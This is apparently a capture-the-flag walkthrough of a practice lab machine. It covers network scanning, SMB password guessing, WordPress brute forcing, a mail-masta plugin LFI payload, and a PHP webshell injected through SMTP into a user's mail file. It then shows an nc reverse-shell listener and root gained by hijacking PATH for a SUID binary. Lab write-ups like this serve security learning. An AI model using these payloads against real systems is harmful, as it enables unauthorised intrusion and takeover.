Initial foothold
- Network discovery
nmap -sn 192.168.60.128/24My target is 192.168.60.131.
2. Port scan
nmap -Pn 192.168.60.131nmap -Pn -p1000- 192.168.60.131
There’re 5 open ports: 22, 25, 80, 139 and 445.
3. OS and service scan
nmap -A -p22,25,80,139,445 192.168.60.131There’re 4 services as listed:
- 22/tcp ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
- 25/tcp smtp Postfix smtpd
- 80/tcp http Apache httpd 2.4.25 ((Debian))
- 139/tcp and 445/tcp netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
4. Vuln scan
nmap --script -p22,25,80,139,445 192.168.60.131There’s is directory discovered on HTTP port 80.
Service Enumeration
- Starting w/ SSH connection om port 22
ssh 192.168.60.131Connection verified
2. Connect to SMTP on port 25
telnet 192.168.131.60 25Connection verified
3. nikto scan on HTTP
nikto -h http://192.168.131.60More directory to explore
4. Directory scan w/ gobuster, I used 3 different wordlists.
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.60.131/ -x php,txt,html,sh,cgi,bak -qgobuster dir --wordlist /usr/share/dirb/wordlists/big.txt -u http://192.168.60.131/ -x php,txt,html,sh,cgi,bak -qgobuster dir --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.60.131/ -x php,txt,html,sh,cgi,bak -q
4. Access the site, explore every possible pages, not much of information revealed.
5. Scan SMB (port 139,445) w/ nmap
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 192.168.60.131There’re anonymous and helios directories.
6. Access SMB:anonymous directory
smbclient //192.168.60.131/anonymousdir
There’s attention.txt
Download and read it
get attention.txtexitcat attention.txt
It’s a password hint.
Save these passwords as ‘pass_from_smb.txt’
Now I know that there’s username:helios and 3 possible passwords.
7. Access SMB:helios directory, It’s not available for anyone. I’ll try to access w/ username:helios
smbclient //192.168.60.131/helios -U heliospassword: epidoko -> failedpassword: qwerty -> succeededdir
Download them
get research.txtget todo.txtexit
Read them
cat research.txtcat todo.txt
There’s string “/h3l105/”. My guess, it’s a hidden directory on HTTP service.
8. Access http://192.168.60.131/h3l105/
It’s a WordPress site.
View page source, there’s “symfonol.local” hostname.
Edit /etc/hosts by adding IP and name
nano /etc/hosts
Refresh HTTP site, now It’s pretty.
9. Enumerate http://symfonos.local/h3l105/, not much on the site.
nikto scan
nikto -h http://symfonos.local/h3l105/
Directory scan
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://symfonos.local/h3l105/ -x php,txt,html,sh,cgi,bak -qgobuster dir --wordlist /usr/share/dirb/wordlists/big.txt -u http://symfonos.local/h3l105/ -x php,txt,html,sh,cgi,bak -qgobuster dir --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://symfonos.local/h3l105/ -x php,txt,html,sh,cgi,bak -q
10. Wordpress scan
wpscan --url http://symfonos.local/h3l105/ -et -ep -eu
Plugin scan
wpscan --url http://symfonos.local/h3l105/ --plugins-detection aggressive
Plugin: mail-masta v.1.0 has LFI vulnerability
11. WordPress password bruteforcing
wpscan --url http://symfonos.local/h3l105/ -et -ep -eu -P pass_from_smb.txtNo passwords found
Change wordlist to rockyou.txt
wpscan --url http://symfonos.local/h3l105/ -et -ep -eu -P /usr/share/wordlist/rockyou.txtI will leave it to scan and checkback later.
Exploitation
- I will use mail-masta 1.0’s LFI vulnerability
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
Beautify the result by viewing page source
2. Since the machine has SMTP service which I can also access. I may able to access service’s related files.
Starting w/ “/var/log/mail.log”
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/log/mail.logNo result
Another possibility is helios’s mail, the path is “/var/mail/helios”
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/heliosI got the result. FromI can inject PHP shell to helios’s mail and acceed it w/ LFI.
3. Access SMTP service and inject the shell
telnet 192.168.60.131 25EHLO jckhmr
MAIL FROM: "jckhmr <?php echo shell_exec($_GET['cmd']);?>"
RCPT TO: helios
DATA
.
quit
4. Test the shell
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=idNow, the shell is working as expected.
5. Reverse shell
Prepare listener
rlwrap nc -lvp 443
I will used commands from this cheatsheet.
After many tries, I succeeded w/ this command
Here’s how I did it.
Intercept LFI request w/ Burp Suite
Send the request to the Repeater
Encode reverse shell command to URL
Paste it to the request and send
Back to listener, now I got the shell.
Privilege Escalation
- Import TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'
2. Explore the machine
cd /optls -la
I identified a binary called statuscheck
Run it
./statuscheck
3. I suspected that It must be SUID
find / -perm -u=s -type f 2>/dev/null
4. strings statuscheck to identify any command usage inside the binary
strings /opt/statuscheckIt calls “curl” command.
5. Create fake path of curl
cd /tmpecho /bin/sh > curlchmod 777 curlexport PATH=/tmp:$PATH/opt/statuscheckwhoami
Now I’m root.
6. Read the flag
cd /rootls -lacat proof.txt
